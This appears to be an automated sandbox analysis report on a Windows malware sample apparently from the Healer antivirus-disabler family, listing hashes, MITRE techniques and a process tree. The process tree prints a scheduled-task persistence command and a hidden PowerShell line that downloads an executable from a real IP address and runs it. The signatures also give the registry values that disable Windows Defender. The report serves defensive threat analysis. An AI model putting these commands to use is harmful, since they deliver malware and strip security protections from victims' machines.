Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
18-02-2025 08:16
Static task
static1
Behavioral task
behavioral1
Sample
f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe
Resource
win7-20241010-en
General
-
Target
f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe
-
Size
938KB
-
MD5
26c90f6f4604983af87055a371f7da5f
-
SHA1
642bcd43ccc2abb6ed712a72da4492bd3fb0e095
-
SHA256
f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d
-
SHA512
abad89afe22b5211b68aabb1d141d131eccbd807b2a66a8b43487ad6b98e251f7d6cf3c0fbb94ddaa3139c8fd3bb08eeb1ea58e7399eb8bb033897c20389c4fb
-
SSDEEP
24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aytl:NTvC/MTQYxsWR7ayt
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4460-37-0x0000000000400000-0x0000000000858000-memory.dmp healer behavioral2/memory/4460-38-0x0000000000400000-0x0000000000858000-memory.dmp healer behavioral2/memory/4460-43-0x0000000000400000-0x0000000000858000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 10 2208 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2208 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 10 2208 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 4460 TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4460 TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3016 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2208 powershell.exe 2208 powershell.exe 4460 TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE 4460 TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE 4460 TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE 4460 TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 4460 TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1264 wrote to memory of 392 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 84 PID 1264 wrote to memory of 392 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 84 PID 1264 wrote to memory of 392 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 84 PID 1264 wrote to memory of 3844 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 85 PID 1264 wrote to memory of 3844 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 85 PID 1264 wrote to memory of 3844 1264 f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe 85 PID 392 wrote to memory of 3016 392 cmd.exe 87 PID 392 wrote to memory of 3016 392 cmd.exe 87 PID 392 wrote to memory of 3016 392 cmd.exe 87 PID 3844 wrote to memory of 2208 3844 mshta.exe 89 PID 3844 wrote to memory of 2208 3844 mshta.exe 89 PID 3844 wrote to memory of 2208 3844 mshta.exe 89 PID 2208 wrote to memory of 4460 2208 powershell.exe 91 PID 2208 wrote to memory of 4460 2208 powershell.exe 91 PID 2208 wrote to memory of 4460 2208 powershell.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe"C:\Users\Admin\AppData\Local\Temp\f746e2e8975cb74d3b9f45412deb4b41ac6500b0aafd16542206522bfcd3d25d.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Uxl0LmaKZyi /tr "mshta C:\Users\Admin\AppData\Local\Temp\qYRbkiNYs.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Uxl0LmaKZyi /tr "mshta C:\Users\Admin\AppData\Local\Temp\qYRbkiNYs.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3016
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\qYRbkiNYs.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE"C:\Users\Admin\AppData\Local\TempAU1KUOIGBLFVJUOECDENOKPPTAZURDT0.EXE"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
5Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD51e112f2e3db5823613597e7988dbde12
SHA1fda13988844ce59a055640273062c4191478dd58
SHA2561f2691360f1369bd6bad02586b96eca71be5194a89df7baf0d43e6a6dc391608
SHA51291f2d297f4bf5c997ae8bd4d32e9c9f32d2402de1fd67e13b7d7d97458c05351ea3196c89f73d2804506073318635c8727f075350301a7cb8b86ca1eae1dc37b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
726B
MD5605e4a0527ebcc63e0878d495a0cc8bc
SHA15e682f933c0523fc2c87543823af3a859ae27271
SHA2567bff2cfc20c9c929734f541693264e8cf207bae2c7d66a1f22c05eed1dbcee6f
SHA5128bbb2b12277a95f3a488fed7776fdd6a21050c7e5b297b3172c8fc4975d8aed380429953543c223eef0ba4d9a9eb96c3b3af9568b6e771e202040b944f230116